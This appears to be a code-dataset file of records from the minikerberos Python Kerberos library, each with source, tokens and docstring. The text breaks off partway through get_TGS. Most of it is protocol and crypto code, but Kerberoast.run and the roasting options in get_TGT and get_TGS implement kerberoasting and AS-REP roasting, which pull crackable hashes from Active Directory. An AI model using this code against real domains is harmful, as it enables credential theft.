] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/security.py#L75-L96 |
skelsec/minikerberos | minikerberos/security.py | Kerberoast.run | def run(self, targets, override_etype = [2, 3, 16, 23, 17, 18]):
"""
Requests TGS tickets for all service users specified in the targets list
targets: list : the SPN users to request the TGS tickets for
allhash: bool : Return all enctype tickets, not just 23
"""
if not self.kcomm:
try:
self.kcomm = KerbrosComm(self.ccred, self.ksoc)
self.kcomm.get_TGT()
except Exception as e:
logger.exception('Failed to get TGT ticket! Reason: %s' % str(e))
tgss = []
for target in targets:
try:
tgs, encTGSRepPart, key = self.kcomm.get_TGS(target, override_etype = override_etype)
tgss.append(tgs)
except Exception as e:
logger.debug('Failed to get TGS ticket for user %s/%s/%s! Reason: %s' % (target.domain, str(target.service), target.username, str(e)))
continue
results = []
for tgs in tgss:
results.append(TGSTicket2hashcat(tgs))
return results | python | def run(self, targets, override_etype = [2, 3, 16, 23, 17, 18]):
"""
Requests TGS tickets for all service users specified in the targets list
targets: list : the SPN users to request the TGS tickets for
allhash: bool : Return all enctype tickets, not just 23
"""
if not self.kcomm:
try:
self.kcomm = KerbrosComm(self.ccred, self.ksoc)
self.kcomm.get_TGT()
except Exception as e:
logger.exception('Failed to get TGT ticket! Reason: %s' % str(e))
tgss = []
for target in targets:
try:
tgs, encTGSRepPart, key = self.kcomm.get_TGS(target, override_etype = override_etype)
tgss.append(tgs)
except Exception as e:
logger.debug('Failed to get TGS ticket for user %s/%s/%s! Reason: %s' % (target.domain, str(target.service), target.username, str(e)))
continue
results = []
for tgs in tgss:
results.append(TGSTicket2hashcat(tgs))
return results | [
"def",
"run",
"(",
"self",
",",
"targets",
",",
"override_etype",
"=",
"[",
"2",
",",
"3",
",",
"16",
",",
"23",
",",
"17",
",",
"18",
"]",
")",
":",
"if",
"not",
"self",
".",
"kcomm",
":",
"try",
":",
"self",
".",
"kcomm",
"=",
"KerbrosComm",
"(",
"self",
".",
"ccred",
",",
"self",
".",
"ksoc",
")",
"self",
".",
"kcomm",
".",
"get_TGT",
"(",
")",
"except",
"Exception",
"as",
"e",
":",
"logger",
".",
"exception",
"(",
"'Failed to get TGT ticket! Reason: %s'",
"%",
"str",
"(",
"e",
")",
")",
"tgss",
"=",
"[",
"]",
"for",
"target",
"in",
"targets",
":",
"try",
":",
"tgs",
",",
"encTGSRepPart",
",",
"key",
"=",
"self",
".",
"kcomm",
".",
"get_TGS",
"(",
"target",
",",
"override_etype",
"=",
"override_etype",
")",
"tgss",
".",
"append",
"(",
"tgs",
")",
"except",
"Exception",
"as",
"e",
":",
"logger",
".",
"debug",
"(",
"'Failed to get TGS ticket for user %s/%s/%s! Reason: %s'",
"%",
"(",
"target",
".",
"domain",
",",
"str",
"(",
"target",
".",
"service",
")",
",",
"target",
".",
"username",
",",
"str",
"(",
"e",
")",
")",
")",
"continue",
"results",
"=",
"[",
"]",
"for",
"tgs",
"in",
"tgss",
":",
"results",
".",
"append",
"(",
"TGSTicket2hashcat",
"(",
"tgs",
")",
")",
"return",
"results"
] | Requests TGS tickets for all service users specified in the targets list
targets: list : the SPN users to request the TGS tickets for
allhash: bool : Return all enctype tickets, not just 23 | [
"Requests",
"TGS",
"tickets",
"for",
"all",
"service",
"users",
"specified",
"in",
"the",
"targets",
"list",
"targets",
":",
"list",
":",
"the",
"SPN",
"users",
"to",
"request",
"the",
"TGS",
"tickets",
"for",
"allhash",
":",
"bool",
":",
"Return",
"all",
"enctype",
"tickets",
"ot",
"just",
"23"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/security.py#L104-L132 |
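A minimal usage sketch for the roasting flow above — the Kerberoast(ccred, ksoc) constructor is an assumption inferred from the self.ccred and self.ksoc references in run(), and ccred, ksoc and targets are placeholder objects prepared elsewhere:
# Hedged sketch; only run() is shown in this record, the constructor is assumed.
from minikerberos.security import Kerberoast

roaster = Kerberoast(ccred, ksoc)   # ccred: user credential, ksoc: KerberosSocket (placeholders)
for line in roaster.run(targets):   # targets: list of SPN KerberosTarget objects
    print(line)                     # hashcat-format TGS hashes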
skelsec/minikerberos | minikerberos/crypto/PBKDF2/pbkdf2.py | pbkdf2 | def pbkdf2(password, salt, iters, keylen, digestmod = hashlib.sha1):
"""Run the PBKDF2 (Password-Based Key Derivation Function 2) algorithm
and return the derived key. The arguments are:
password (bytes or bytearray) -- the input password
salt (bytes or bytearray) -- a cryptographic salt
iters (int) -- number of iterations
keylen (int) -- length of key to derive
digestmod -- a cryptographic hash function: either a module
supporting PEP 247, a hashlib constructor, or (in Python 3.4
or later) the name of a hash function.
For example:
>>> import hashlib
>>> from binascii import hexlify, unhexlify
>>> password = b'Squeamish Ossifrage'
>>> salt = unhexlify(b'1234567878563412')
>>> hexlify(pbkdf2(password, salt, 500, 16, hashlib.sha1))
b'9e8f1072bdf5ef042bd988c7da83e43b'
"""
h = hmac.new(password, digestmod=digestmod)
def prf(data):
hm = h.copy()
hm.update(data)
return bytearray(hm.digest())
key = bytearray()
i = 1
while len(key) < keylen:
T = U = prf(salt + struct.pack('>i', i))
for _ in range(iters - 1):
U = prf(U)
T = bytearray(x ^ y for x, y in zip(T, U))
key += T
i += 1
return key[:keylen] | python | def pbkdf2(password, salt, iters, keylen, digestmod = hashlib.sha1):
"""Run the PBKDF2 (Password-Based Key Derivation Function 2) algorithm
and return the derived key. The arguments are:
password (bytes or bytearray) -- the input password
salt (bytes or bytearray) -- a cryptographic salt
iters (int) -- number of iterations
keylen (int) -- length of key to derive
digestmod -- a cryptographic hash function: either a module
supporting PEP 247, a hashlib constructor, or (in Python 3.4
or later) the name of a hash function.
For example:
>>> import hashlib
>>> from binascii import hexlify, unhexlify
>>> password = b'Squeamish Ossifrage'
>>> salt = unhexlify(b'1234567878563412')
>>> hexlify(pbkdf2(password, salt, 500, 16, hashlib.sha1))
b'9e8f1072bdf5ef042bd988c7da83e43b'
"""
h = hmac.new(password, digestmod=digestmod)
def prf(data):
hm = h.copy()
hm.update(data)
return bytearray(hm.digest())
key = bytearray()
i = 1
while len(key) < keylen:
T = U = prf(salt + struct.pack('>i', i))
for _ in range(iters - 1):
U = prf(U)
T = bytearray(x ^ y for x, y in zip(T, U))
key += T
i += 1
return key[:keylen] | [
"def",
"pbkdf2",
"(",
"password",
",",
"salt",
",",
"iters",
",",
"keylen",
",",
"digestmod",
"=",
"hashlib",
".",
"sha1",
")",
":",
"h",
"=",
"hmac",
".",
"new",
"(",
"password",
",",
"digestmod",
"=",
"digestmod",
")",
"def",
"prf",
"(",
"data",
")",
":",
"hm",
"=",
"h",
".",
"copy",
"(",
")",
"hm",
".",
"update",
"(",
"data",
")",
"return",
"bytearray",
"(",
"hm",
".",
"digest",
"(",
")",
")",
"key",
"=",
"bytearray",
"(",
")",
"i",
"=",
"1",
"while",
"len",
"(",
"key",
")",
"<",
"keylen",
":",
"T",
"=",
"U",
"=",
"prf",
"(",
"salt",
"+",
"struct",
".",
"pack",
"(",
"'>i'",
",",
"i",
")",
")",
"for",
"_",
"in",
"range",
"(",
"iters",
"-",
"1",
")",
":",
"U",
"=",
"prf",
"(",
"U",
")",
"T",
"=",
"bytearray",
"(",
"x",
"^",
"y",
"for",
"x",
",",
"y",
"in",
"zip",
"(",
"T",
",",
"U",
")",
")",
"key",
"+=",
"T",
"i",
"+=",
"1",
"return",
"key",
"[",
":",
"keylen",
"]"
] | Run the PBKDF2 (Password-Based Key Derivation Function 2) algorithm
and return the derived key. The arguments are:
password (bytes or bytearray) -- the input password
salt (bytes or bytearray) -- a cryptographic salt
iters (int) -- number of iterations
keylen (int) -- length of key to derive
digestmod -- a cryptographic hash function: either a module
supporting PEP 247, a hashlib constructor, or (in Python 3.4
or later) the name of a hash function.
For example:
>>> import hashlib
>>> from binascii import hexlify, unhexlify
>>> password = b'Squeamish Ossifrage'
>>> salt = unhexlify(b'1234567878563412')
>>> hexlify(pbkdf2(password, salt, 500, 16, hashlib.sha1))
b'9e8f1072bdf5ef042bd988c7da83e43b' | [
"Run",
"the",
"PBKDF2",
"(",
"Password",
"-",
"Based",
"Key",
"Derivation",
"Function",
"2",
")",
"algorithm",
"and",
"return",
"the",
"derived",
"key",
".",
"The",
"arguments",
"are",
":"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/crypto/PBKDF2/pbkdf2.py#L7-L45 |
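Since pbkdf2() above implements standard PBKDF2-HMAC (RFC 2898), it can be cross-checked against Python's stdlib implementation:
# Cross-check: hashlib.pbkdf2_hmac performs the same derivation.
import hashlib
from binascii import unhexlify

password = b'Squeamish Ossifrage'
salt = unhexlify(b'1234567878563412')
expected = hashlib.pbkdf2_hmac('sha1', password, salt, 500, 16)
assert bytes(pbkdf2(password, salt, 500, 16, hashlib.sha1)) == expected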
skelsec/minikerberos | minikerberos/communication.py | KerberosSocket.from_connection_string | def from_connection_string(s, soc_type = KerberosSocketType.TCP):
"""
<credentials>@<ip_or_hostname>:<port>
"""
ip = None
port = 88
	t, addr = s.rsplit('@', 1)
if addr.find(':') == -1:
ip = addr
else:
ip, port = addr.split(':')
return KerberosSocket(ip, port = int(port), soc_type = soc_type) | python | def from_connection_string(s, soc_type = KerberosSocketType.TCP):
"""
<credentials>@<ip_or_hostname>:<port>
"""
ip = None
port = 88
	t, addr = s.rsplit('@', 1)
if addr.find(':') == -1:
ip = addr
else:
ip, port = addr.split(':')
return KerberosSocket(ip, port = int(port), soc_type = soc_type) | [
"def",
"from_connection_string",
"(",
"s",
",",
"soc_type",
"=",
"KerberosSocketType",
".",
"TCP",
")",
":",
"ip",
"=",
"None",
"port",
"=",
"88",
"t",
",",
"addr",
"=",
"s",
".",
"rsplit",
"(",
"'@'",
")",
"if",
"addr",
".",
"find",
"(",
"':'",
")",
"==",
"-",
"1",
":",
"ip",
"=",
"addr",
"else",
":",
"ip",
",",
"port",
"=",
"addr",
".",
"split",
"(",
"':'",
")",
"return",
"KerberosSocket",
"(",
"ip",
",",
"port",
"=",
"int",
"(",
"port",
")",
",",
"soc_type",
"=",
"soc_type",
")"
] | <credentials>@<ip_or_hostname>:<port> | [
"<credentials",
">"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L42-L55 |
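Example inputs accepted by the parser above; everything before the last '@' is treated as an opaque credential string (the function never uses it), and the port defaults to 88 when omitted:
from minikerberos.communication import KerberosSocket

ks1 = KerberosSocket.from_connection_string('TEST/user/pw:secret@10.0.0.1:88')
ks2 = KerberosSocket.from_connection_string('TEST/user/pw:secret@dc01.test.corp')  # port defaults to 88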
skelsec/minikerberos | minikerberos/communication.py | KerbrosComm.from_tgt | def from_tgt(ksoc, tgt, key):
"""
Sets up the kerberos object from tgt and the session key.
Use this function when pulling the TGT from ccache file.
"""
kc = KerbrosComm(None, ksoc)
kc.kerberos_TGT = tgt
kc.kerberos_cipher_type = key['keytype']
kc.kerberos_session_key = Key(kc.kerberos_cipher_type, key['keyvalue'])
kc.kerberos_cipher = _enctype_table[kc.kerberos_cipher_type]
return kc | python | def from_tgt(ksoc, tgt, key):
"""
Sets up the kerberos object from tgt and the session key.
Use this function when pulling the TGT from ccache file.
"""
kc = KerbrosComm(None, ksoc)
kc.kerberos_TGT = tgt
kc.kerberos_cipher_type = key['keytype']
kc.kerberos_session_key = Key(kc.kerberos_cipher_type, key['keyvalue'])
kc.kerberos_cipher = _enctype_table[kc.kerberos_cipher_type]
return kc | [
"def",
"from_tgt",
"(",
"ksoc",
",",
"tgt",
",",
"key",
")",
":",
"kc",
"=",
"KerbrosComm",
"(",
"None",
",",
"ksoc",
")",
"kc",
".",
"kerberos_TGT",
"=",
"tgt",
"kc",
".",
"kerberos_cipher_type",
"=",
"key",
"[",
"'keytype'",
"]",
"kc",
".",
"kerberos_session_key",
"=",
"Key",
"(",
"kc",
".",
"kerberos_cipher_type",
",",
"key",
"[",
"'keyvalue'",
"]",
")",
"kc",
".",
"kerberos_cipher",
"=",
"_enctype_table",
"[",
"kc",
".",
"kerberos_cipher_type",
"]",
"return",
"kc"
] | Sets up the kerberos object from tgt and the session key.
Use this function when pulling the TGT from ccache file. | [
"Sets",
"up",
"the",
"kerberos",
"object",
"from",
"tgt",
"and",
"the",
"session",
"key",
".",
"Use",
"this",
"function",
"when",
"pulling",
"the",
"TGT",
"from",
"ccache",
"file",
"."
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L138-L149 |
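A hedged sketch of the intended use — tgt (the AS-REP native structure) and key (a dict with 'keytype' and 'keyvalue' entries, as read by the constructor above) are assumed to come from minikerberos' ccache parsing, which is not shown in this record:
kc = KerbrosComm.from_tgt(ksoc, tgt, key)                  # ksoc: KerberosSocket (placeholder)
tgs, enc_tgs_rep_part, session_key = kc.get_TGS(spn_user)  # spn_user: KerberosTarget (placeholder)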
skelsec/minikerberos | minikerberos/communication.py | KerbrosComm.get_TGT | def get_TGT(self, override_etype = None, decrypt_tgt = True):
"""
decrypt_tgt: used for asreproast attacks
Steps performed:
	1. Send an empty (no encrypted timestamp) AS_REQ with all the encryption types we support
2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
3. PROFIT
"""
logger.debug('Generating initial TGT without authentication data')
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
kdc_req_body['realm'] = self.usercreds.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype is None:
kdc_req_body['etype'] = self.usercreds.get_supported_enctypes()
else:
kdc_req_body['etype'] = override_etype
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = AS_REQ(kdc_req)
logger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
#user can do kerberos auth without preauthentication!
self.kerberos_TGT = rep.native
#if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt
#so we just return, the asrep can be extracted from this object anyhow
if decrypt_tgt == False:
return
self.kerberos_cipher = _enctype_table[23]
self.kerberos_cipher_type = 23
self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(EncryptionType.ARCFOUR_HMAC_MD5))
else:
if rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
raise KerberosError(rep)
rep = rep.native
		logger.debug('Got reply from server, asking to provide auth data')
rep = self.do_preauth(rep)
logger.debug('Got valid TGT response from server')
rep = rep.native
self.kerberos_TGT = rep
cipherText = rep['enc-part']['cipher']
temp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)
self.kerberos_TGT_encpart = EncASRepPart.load(temp).native
self.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])
self.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)
logger.debug('Got valid TGT')
return | python | def get_TGT(self, override_etype = None, decrypt_tgt = True):
"""
decrypt_tgt: used for asreproast attacks
Steps performed:
	1. Send an empty (no encrypted timestamp) AS_REQ with all the encryption types we support
2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
3. PROFIT
"""
logger.debug('Generating initial TGT without authentication data')
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
kdc_req_body['realm'] = self.usercreds.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype is None:
kdc_req_body['etype'] = self.usercreds.get_supported_enctypes()
else:
kdc_req_body['etype'] = override_etype
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = AS_REQ(kdc_req)
logger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
#user can do kerberos auth without preauthentication!
self.kerberos_TGT = rep.native
#if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt
#so we just return, the asrep can be extracted from this object anyhow
if decrypt_tgt == False:
return
self.kerberos_cipher = _enctype_table[23]
self.kerberos_cipher_type = 23
self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(EncryptionType.ARCFOUR_HMAC_MD5))
else:
if rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
raise KerberosError(rep)
rep = rep.native
		logger.debug('Got reply from server, asking to provide auth data')
rep = self.do_preauth(rep)
logger.debug('Got valid TGT response from server')
rep = rep.native
self.kerberos_TGT = rep
cipherText = rep['enc-part']['cipher']
temp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)
self.kerberos_TGT_encpart = EncASRepPart.load(temp).native
self.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])
self.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)
logger.debug('Got valid TGT')
return | [
"def",
"get_TGT",
"(",
"self",
",",
"override_etype",
"=",
"None",
",",
"decrypt_tgt",
"=",
"True",
")",
":",
"logger",
".",
"debug",
"(",
"'Generating initial TGT without authentication data'",
")",
"now",
"=",
"datetime",
".",
"datetime",
".",
"utcnow",
"(",
")",
"kdc_req_body",
"=",
"{",
"}",
"kdc_req_body",
"[",
"'kdc-options'",
"]",
"=",
"KDCOptions",
"(",
"set",
"(",
"[",
"'forwardable'",
",",
"'renewable'",
",",
"'proxiable'",
"]",
")",
")",
"kdc_req_body",
"[",
"'cname'",
"]",
"=",
"PrincipalName",
"(",
"{",
"'name-type'",
":",
"NAME_TYPE",
".",
"PRINCIPAL",
".",
"value",
",",
"'name-string'",
":",
"[",
"self",
".",
"usercreds",
".",
"username",
"]",
"}",
")",
"kdc_req_body",
"[",
"'realm'",
"]",
"=",
"self",
".",
"usercreds",
".",
"domain",
".",
"upper",
"(",
")",
"kdc_req_body",
"[",
"'sname'",
"]",
"=",
"PrincipalName",
"(",
"{",
"'name-type'",
":",
"NAME_TYPE",
".",
"PRINCIPAL",
".",
"value",
",",
"'name-string'",
":",
"[",
"'krbtgt'",
",",
"self",
".",
"usercreds",
".",
"domain",
".",
"upper",
"(",
")",
"]",
"}",
")",
"kdc_req_body",
"[",
"'till'",
"]",
"=",
"now",
"+",
"datetime",
".",
"timedelta",
"(",
"days",
"=",
"1",
")",
"kdc_req_body",
"[",
"'rtime'",
"]",
"=",
"now",
"+",
"datetime",
".",
"timedelta",
"(",
"days",
"=",
"1",
")",
"kdc_req_body",
"[",
"'nonce'",
"]",
"=",
"secrets",
".",
"randbits",
"(",
"31",
")",
"if",
"override_etype",
"is",
"None",
":",
"kdc_req_body",
"[",
"'etype'",
"]",
"=",
"self",
".",
"usercreds",
".",
"get_supported_enctypes",
"(",
")",
"else",
":",
"kdc_req_body",
"[",
"'etype'",
"]",
"=",
"override_etype",
"pa_data_1",
"=",
"{",
"}",
"pa_data_1",
"[",
"'padata-type'",
"]",
"=",
"int",
"(",
"PADATA_TYPE",
"(",
"'PA-PAC-REQUEST'",
")",
")",
"pa_data_1",
"[",
"'padata-value'",
"]",
"=",
"PA_PAC_REQUEST",
"(",
"{",
"'include-pac'",
":",
"True",
"}",
")",
".",
"dump",
"(",
")",
"kdc_req",
"=",
"{",
"}",
"kdc_req",
"[",
"'pvno'",
"]",
"=",
"krb5_pvno",
"kdc_req",
"[",
"'msg-type'",
"]",
"=",
"MESSAGE_TYPE",
".",
"KRB_AS_REQ",
".",
"value",
"kdc_req",
"[",
"'padata'",
"]",
"=",
"[",
"pa_data_1",
"]",
"kdc_req",
"[",
"'req-body'",
"]",
"=",
"KDC_REQ_BODY",
"(",
"kdc_req_body",
")",
"req",
"=",
"AS_REQ",
"(",
"kdc_req",
")",
"logger",
".",
"debug",
"(",
"'Sending initial TGT to %s'",
"%",
"self",
".",
"ksoc",
".",
"get_addr_str",
"(",
")",
")",
"rep",
"=",
"self",
".",
"ksoc",
".",
"sendrecv",
"(",
"req",
".",
"dump",
"(",
")",
",",
"throw",
"=",
"False",
")",
"if",
"rep",
".",
"name",
"!=",
"'KRB_ERROR'",
":",
"#user can do kerberos auth without preauthentication!",
"self",
".",
"kerberos_TGT",
"=",
"rep",
".",
"native",
"#if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt",
"#so we just return, the asrep can be extracted from this object anyhow",
"if",
"decrypt_tgt",
"==",
"False",
":",
"return",
"self",
".",
"kerberos_cipher",
"=",
"_enctype_table",
"[",
"23",
"]",
"self",
".",
"kerberos_cipher_type",
"=",
"23",
"self",
".",
"kerberos_key",
"=",
"Key",
"(",
"self",
".",
"kerberos_cipher",
".",
"enctype",
",",
"self",
".",
"usercreds",
".",
"get_key_for_enctype",
"(",
"EncryptionType",
".",
"ARCFOUR_HMAC_MD5",
")",
")",
"else",
":",
"if",
"rep",
".",
"native",
"[",
"'error-code'",
"]",
"!=",
"KerberosErrorCode",
".",
"KDC_ERR_PREAUTH_REQUIRED",
".",
"value",
":",
"raise",
"KerberosError",
"(",
"rep",
")",
"rep",
"=",
"rep",
".",
"native",
"logger",
".",
"debug",
"(",
"'Got reply from server, asikg to provide auth data'",
")",
"rep",
"=",
"self",
".",
"do_preauth",
"(",
"rep",
")",
"logger",
".",
"debug",
"(",
"'Got valid TGT response from server'",
")",
"rep",
"=",
"rep",
".",
"native",
"self",
".",
"kerberos_TGT",
"=",
"rep",
"cipherText",
"=",
"rep",
"[",
"'enc-part'",
"]",
"[",
"'cipher'",
"]",
"temp",
"=",
"self",
".",
"kerberos_cipher",
".",
"decrypt",
"(",
"self",
".",
"kerberos_key",
",",
"3",
",",
"cipherText",
")",
"self",
".",
"kerberos_TGT_encpart",
"=",
"EncASRepPart",
".",
"load",
"(",
"temp",
")",
".",
"native",
"self",
".",
"kerberos_session_key",
"=",
"Key",
"(",
"self",
".",
"kerberos_cipher",
".",
"enctype",
",",
"self",
".",
"kerberos_TGT_encpart",
"[",
"'key'",
"]",
"[",
"'keyvalue'",
"]",
")",
"self",
".",
"ccache",
".",
"add_tgt",
"(",
"self",
".",
"kerberos_TGT",
",",
"self",
".",
"kerberos_TGT_encpart",
",",
"override_pp",
"=",
"True",
")",
"logger",
".",
"debug",
"(",
"'Got valid TGT'",
")",
"return"
] | decrypt_tgt: used for asreproast attacks
Steps performed:
1. Send an empty (no encrypted timestamp) AS_REQ with all the encryption types we support
2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
3. PROFIT | [
"decrypt_tgt",
":",
"used",
"for",
"asreproast",
"attacks",
"Steps",
"performed",
":",
"1",
".",
"Send",
"and",
"empty",
"(",
"no",
"encrypted",
"timestamp",
")",
"AS_REQ",
"with",
"all",
"the",
"encryption",
"types",
"we",
"support",
"2",
".",
"Depending",
"on",
"the",
"response",
"(",
"either",
"error",
"or",
"AS_REP",
"with",
"TGT",
")",
"we",
"either",
"send",
"another",
"AS_REQ",
"with",
"the",
"encrypted",
"data",
"or",
"return",
"the",
"TGT",
"(",
"or",
"fail",
"miserably",
")",
"3",
".",
"PROFIT"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L215-L285 |
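Usage sketch for the two AS-exchange modes described in the docstring above (ccred and ksoc are placeholder credential and socket objects prepared elsewhere):
kc = KerbrosComm(ccred, ksoc)
kc.get_TGT()                    # full exchange; the decrypted TGT is cached in kc.ccache
kc2 = KerbrosComm(ccred, ksoc)
kc2.get_TGT(decrypt_tgt=False)  # AS-REP roasting: keep the undecrypted reply in kc2.kerberos_TGT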
skelsec/minikerberos | minikerberos/communication.py | KerbrosComm.get_TGS | def get_TGS(self, spn_user, override_etype = None):
"""
Requests a TGS ticket for the specified user.
	Returns the TGS ticket and the decrypted encTGSRepPart.
spn_user: KerberosTarget: the service user you want to get TGS for.
	override_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which are derived from the TGT) to be able to receive whatever TGS ticket
"""
#construct tgs_req
logger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize']))
kdc_req_body['realm'] = spn_user.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype:
kdc_req_body['etype'] = override_etype
else:
kdc_req_body['etype'] = [self.kerberos_cipher_type]
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_1 = {}
pa_data_1['padata-type'] = PaDataType.TGS_REQ.value
pa_data_1['padata-value'] = AP_REQ(ap_req).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = TGS_REQ(kdc_req)
	logger.debug('Sending TGS request to server')
rep = self.ksoc.sendrecv(req.dump())
logger.debug('Got TGS reply, decrypting...')
tgs = rep.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key | python | def get_TGS(self, spn_user, override_etype = None):
"""
Requests a TGS ticket for the specified user.
	Returns the TGS ticket and the decrypted encTGSRepPart.
spn_user: KerberosTarget: the service user you want to get TGS for.
	override_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which are derived from the TGT) to be able to receive whatever TGS ticket
"""
#construct tgs_req
logger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize']))
kdc_req_body['realm'] = spn_user.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype:
kdc_req_body['etype'] = override_etype
else:
kdc_req_body['etype'] = [self.kerberos_cipher_type]
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
